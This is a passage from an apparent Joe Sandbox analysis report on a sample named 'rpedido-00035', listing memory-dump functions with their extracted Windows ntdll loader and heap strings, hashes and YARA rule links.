                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 3446177414-3154609507
                                                          • Opcode ID: 52281ee1edb1fd3c923f995d538b685f5d092af1083443d8d764742ccf4373b9
                                                          • Instruction ID: 3fd01275d7d36f9acce9707427787a0623c4c26df3e90ae659a4fa41fded39ab
                                                          • Opcode Fuzzy Hash: 52281ee1edb1fd3c923f995d538b685f5d092af1083443d8d764742ccf4373b9
                                                          • Instruction Fuzzy Hash: 0B41F376A053218BDB10CF59C941A9A7FE6AF48754F0506D9FD98A7271D730D800EFE1
                                                          Function 3603510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Kernel-MUI-Language-Allowed, xrefs: 3603519B
                                                          • Kernel-MUI-Number-Allowed, xrefs: 36035167
                                                          • Kernel-MUI-Language-SKU, xrefs: 3603534B
                                                          • WindowsExcludedProcs, xrefs: 3603514A
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 36035272
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 0-258546922
                                                          • Opcode ID: 927ddc9f000d5eb781ae4375d40271ccf270ea775ce495ee858328af34c06548
                                                          • Instruction ID: 1a046b1c5756a51024cccaa950d4e5e1282aaba28a2170932dee0d555bc93558
                                                          • Opcode Fuzzy Hash: 927ddc9f000d5eb781ae4375d40271ccf270ea775ce495ee858328af34c06548
                                                          • Instruction Fuzzy Hash: C3F14076D01619EFDB16CFD5C981ADEBFF8EF08650F61449AE501A7210E7709E01CBA1
                                                          Function 360EACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 8da1af5d851d7451e35dd10fbc42f43683a7272a0eeae31f5c9fdeb905b67fac
                                                          • Instruction ID: 00390082b9410334d2b98e4beb140c1bbca11cd33a434f6f27c98613012ce524
                                                          • Opcode Fuzzy Hash: 8da1af5d851d7451e35dd10fbc42f43683a7272a0eeae31f5c9fdeb905b67fac
                                                          • Instruction Fuzzy Hash: ECF1F676E00A218FDB08CFA9C9A267DBFF5AF88210B5941A9D456EB380D774E941CB50
                                                          Function 36007662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                          • API String ID: 0-3061284088
                                                          • Opcode ID: cdf91bd723d306225dcb283d6464567d9467f75f897d645c137330a1cc119469
                                                          • Instruction ID: 94a39249f127d8b5065070dc42c4d05d79b3fef3da9a82b25b0e258c318c4859
                                                          • Opcode Fuzzy Hash: cdf91bd723d306225dcb283d6464567d9467f75f897d645c137330a1cc119469
                                                          • Instruction Fuzzy Hash: 7D019C361051809EF305A36DD80AF4A7FE4DB4173CF1648C9E400575808B959890DA61
                                                          Function 36010485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36010586
                                                          • kLsE, xrefs: 360105FE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 3446177414-2547482624
                                                          • Opcode ID: 766fbe3a4ed7a43304d7ed8522f26e1ea79bc3980d2be4546cee7b74e32dec14
                                                          • Instruction ID: 849210b3c09c381bf9644d061f616924cb99a8ae736c18ce38874d6e3f21ccd4
                                                          • Opcode Fuzzy Hash: 766fbe3a4ed7a43304d7ed8522f26e1ea79bc3980d2be4546cee7b74e32dec14
                                                          • Instruction Fuzzy Hash: 7651C4B9A10745DFE710DFA6C6426ABBBF4EF44308F1084BED5D687240EB349545CBA2
                                                          Function 3601A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          • Opcode ID: 6ef8589298190a9c7482b543ce807146bd250c748218828bdbc937a67fc7043a
                                                          • Instruction ID: d3e89c1c6f7fbb498b730883a121c790fec6def6ff3a33b99ad2ec78ab8d2d37
                                                          • Opcode Fuzzy Hash: 6ef8589298190a9c7482b543ce807146bd250c748218828bdbc937a67fc7043a
                                                          • Instruction Fuzzy Hash: A6C1B1B8508391CFE711CF55C542B5EBBE4FF84748F0049AAF885AB250EBB4C946CB96
                                                          Function 36048322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • @, xrefs: 360484B1
                                                          • LdrpInitializeProcess, xrefs: 36048342
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 36048341
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3604847E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          • Opcode ID: 4fc01ff7c29e9d99484cb5ba8acab6280af92498263b52c8f11f32edd237d89f
                                                          • Instruction ID: 0a5b309b477f043b5c19199ab58599a79cc7322da00008f18e756560b8e660fa
                                                          • Opcode Fuzzy Hash: 4fc01ff7c29e9d99484cb5ba8acab6280af92498263b52c8f11f32edd237d89f
                                                          • Instruction Fuzzy Hash: 15916C71548344AFE722EE61CD82EABBEECAF84784F4109ADF68492150E734C944CB66
                                                          Function 3604265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() passed the empty activation context, xrefs: 36081FE8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 36081FE3, 360820BB
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 360820C0
                                                          • .Local, xrefs: 360427F8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          • Opcode ID: d2e3a69fee67ea4e5f69807b58bcce1321a340cd626dee13ad4be7b3e4e25906
                                                          • Instruction ID: 6dba5aaf91eeea618fc44604b17a2ff3c4dc56e4225d13e843eb71aba412cdbf
                                                          • Opcode Fuzzy Hash: d2e3a69fee67ea4e5f69807b58bcce1321a340cd626dee13ad4be7b3e4e25906
                                                          • Instruction Fuzzy Hash: 02A1CE35E013299BEB21DF65DC85B99BBB1BF18314F2101FAD808A7251DB719E81CF98
                                                          Function 360163CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 36070DEC
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 36070E72
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 36070EB5
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 36070E2F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          • Opcode ID: a07d457e9d53f327ad23b2d5a4125317565d33ef1bac5c5f58ba8f04bbf0a9c3
                                                          • Instruction ID: 06598be0434a119c85a6febe211b6207aaf0a922847db571d376e907c8d928e2
                                                          • Opcode Fuzzy Hash: a07d457e9d53f327ad23b2d5a4125317565d33ef1bac5c5f58ba8f04bbf0a9c3
                                                          • Instruction Fuzzy Hash: 9471ECB58183149FEB50CF50CD86B8B7FE8AF847A4F5005A9F9488A292D734D588CBD2
                                                          Function 3600F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                          • API String ID: 0-2586055223
                                                          • Opcode ID: 1678b007ba11c68213535a027d638f0c1f81baaa03f364fd8c5b8af4f59b1d55
                                                          • Instruction ID: 2203d77507fbe144a8fa1b730d4dc76f027910b47d10fc905dbf891e46def033
                                                          • Opcode Fuzzy Hash: 1678b007ba11c68213535a027d638f0c1f81baaa03f364fd8c5b8af4f59b1d55
                                                          • Instruction Fuzzy Hash: 4461EE756087819FF311CB65CD46F5BBFE9EF80B98F1408E9E9548B291CA34E840DB62
                                                          Function 360090F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                          • API String ID: 2994545307-1391187441
                                                          • Opcode ID: d258d3100ca0b07101d18fb57b9177392d47b81ed7355575364d7f8a50ef4012
                                                          • Instruction ID: 351d6953242922ae39c9b6970f5f5ca821b65a8abbd333913734ff772234bccf
                                                          • Opcode Fuzzy Hash: d258d3100ca0b07101d18fb57b9177392d47b81ed7355575364d7f8a50ef4012
                                                          • Instruction Fuzzy Hash: 4D31F476A00216EFE701CB96CC86F9EBBF8EF44764F1144E1E410A72A1D771D940CE61
                                                          Function 36017072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 60c41dc1e0bca5f3707e416175bd54e85ffcfcf5342161cb37c637c48eaf22c1
                                                          • Instruction ID: a39a3aa8185a4be2fd5231d36e697aa7aefdb02afb4f8b146cec5f18812f0ee4
                                                          • Opcode Fuzzy Hash: 60c41dc1e0bca5f3707e416175bd54e85ffcfcf5342161cb37c637c48eaf22c1
                                                          • Instruction Fuzzy Hash: C8512038E00715EFEB0ACB28C95A7ADBFB5BF04365F2041EAE10297290DB709951CB81
                                                          Function 360A3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                          • API String ID: 0-1168191160
                                                          • Opcode ID: f9adc379991922835b9752d5a99b46563d046b8a76a46efab25ff48bdedbac51
                                                          • Instruction ID: 9e3f6f707948a8e0722130190785b1fe229e5c69d9cceed98d65fdc5a6784d67
                                                          • Opcode Fuzzy Hash: f9adc379991922835b9752d5a99b46563d046b8a76a46efab25ff48bdedbac51
                                                          • Instruction Fuzzy Hash: F0F17FB5E003288BDB28CBA5CD8279DBBB5EF44784F5480D9DA09E7240DB319A85CF95
                                                          Function 36011380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36011648
                                                          • HEAP: , xrefs: 360114B6
                                                          • HEAP[%wZ]: , xrefs: 36011632
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: 572800d127936565593bdc23360abf00c99bba2693c6beb2b00a1d98a0445283
                                                          • Instruction ID: dfc8b655edd475885c411ec83b6e6b8db3cc33440b17de83ae4ee3cf7dfd3db7
                                                          • Opcode Fuzzy Hash: 572800d127936565593bdc23360abf00c99bba2693c6beb2b00a1d98a0445283
                                                          • Instruction Fuzzy Hash: EBE1E078A043559FEB18CF69C48277ABFF5EF48308F1488D9E5968B245E734E981CB90
                                                          Function 3603F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 360800C7
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 360800F1
                                                          • RTL: Re-Waiting, xrefs: 36080128
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: 0457fdd8e4611ffdbf5bbe7e3192d54c67a603ba2e79a5a963db3ab3a7d7f676
                                                          • Instruction ID: 1dee4eb5eefe72418dc994ef00cbee0804e0afebd08c3a9ccc40ef40921f9eb2
                                                          • Opcode Fuzzy Hash: 0457fdd8e4611ffdbf5bbe7e3192d54c67a603ba2e79a5a963db3ab3a7d7f676
                                                          • Instruction Fuzzy Hash: 3FE1D275A09741DFE711CF28C982B0ABBE0BF44368F204A9DF5658B2E1DB74D944CB82
                                                          Function 3601B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                          • API String ID: 0-1145731471
                                                          • Opcode ID: e6acb9b3f66fd63fe861cfddf9b0421de77df6ec4b21ec5c67942f6e45cc506c
                                                          • Instruction ID: ed66f9737241ba1af1f2772e9e3cd1aa05d416cc9cdae9dbdcf473316ef90998
                                                          • Opcode Fuzzy Hash: e6acb9b3f66fd63fe861cfddf9b0421de77df6ec4b21ec5c67942f6e45cc506c
                                                          • Instruction Fuzzy Hash: 8EB1BC7AA107198BEB19CF66C992B9DBBF1BF44754F2084A9E911EB390D730E940CF44
                                                          Function 3609330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                          • API String ID: 0-2391371766
                                                          • Opcode ID: 6e3336bd4d0607171bcba67808edf692e7eb8d76d10684181dde3b2431f21f32
                                                          • Instruction ID: 5771780af5c99e15fd21191b277465a9bc2cbcd5f0130ef76cd63c9a7e11ac8c
                                                          • Opcode Fuzzy Hash: 6e3336bd4d0607171bcba67808edf692e7eb8d76d10684181dde3b2431f21f32
                                                          • Instruction Fuzzy Hash: C1B10471604301AFE311CF61CD82F9BBBEAEB44714F4148A9FA409B2A0D771E858DF92
                                                          Function 360A327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                          • API String ID: 0-318774311
                                                          • Opcode ID: 4b9f2c378b84534021331a2c8b6be14e865b5b43735145c8e13fd49ac4625d3b
                                                          • Instruction ID: 651acba50c158fadf41dd9c81d8bc3ac56d0967179b50e9f434fc741f867896c
                                                          • Opcode Fuzzy Hash: 4b9f2c378b84534021331a2c8b6be14e865b5b43735145c8e13fd49ac4625d3b
                                                          • Instruction Fuzzy Hash: 91819E76608350AFE319CB65C942B5ABBE8EF84794F4009ADFD80DB290DB75D900CB92
                                                          Function 3601B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                          • API String ID: 0-373624363
                                                          • Opcode ID: 05d3b7c945afc5998f4fca84cbb785e89ce0cc58183954159f3113d0233ca79a
                                                          • Instruction ID: dc34207480918d3aec7665e88cb1352834c7d1f6a68019e7c45797040ee94dee
                                                          • Opcode Fuzzy Hash: 05d3b7c945afc5998f4fca84cbb785e89ce0cc58183954159f3113d0233ca79a
                                                          • Instruction Fuzzy Hash: 0D91DEB9E04359CBEB15CF65D9427ADBBF0FF04364F2481D9E810AB290D7789A80CB90
                                                          Function 360EB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • TargetNtPath, xrefs: 360EB3AF
                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 360EB3AA
                                                          • GlobalizationUserSettings, xrefs: 360EB3B4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                          • API String ID: 0-505981995
                                                          • Opcode ID: 220406721a17f9b49efadd059fd8812f03e2689887b9a53794c78232703dda89
                                                          • Instruction ID: 32a1e6c34a768c0ce1d28a4af469b9bd3cf55e75aba289ac052724acbe393d60
                                                          • Opcode Fuzzy Hash: 220406721a17f9b49efadd059fd8812f03e2689887b9a53794c78232703dda89
                                                          • Instruction Fuzzy Hash: BA618072D42628AFDB21DF55DD8ABDABBF8AB04710F4101E5E508AB250DB74DE84CF90
                                                          Function 3600F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HEAP: , xrefs: 3606E442
                                                          • HEAP[%wZ]: , xrefs: 3606E435
                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3606E455
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                          • API String ID: 0-1340214556
                                                          • Opcode ID: 703b19e0b4ef775d2d7279079f86bd60530268b59160bddc2b3cc9630998f578
                                                          • Instruction ID: 3ee2dd73974996b9121961293a018d8bd6f9e3fe2a6e6d45b68abc5be6ea7660
                                                          • Opcode Fuzzy Hash: 703b19e0b4ef775d2d7279079f86bd60530268b59160bddc2b3cc9630998f578
                                                          • Instruction Fuzzy Hash: 51510135A04794AFF302CBA9C986B9ABFF8FF04748F1444E4E9408B292D774EA44DB51
                                                          Function 36031514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3607A3A7
                                                          • LdrpCompleteMapModule, xrefs: 3607A39D
                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3607A396
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
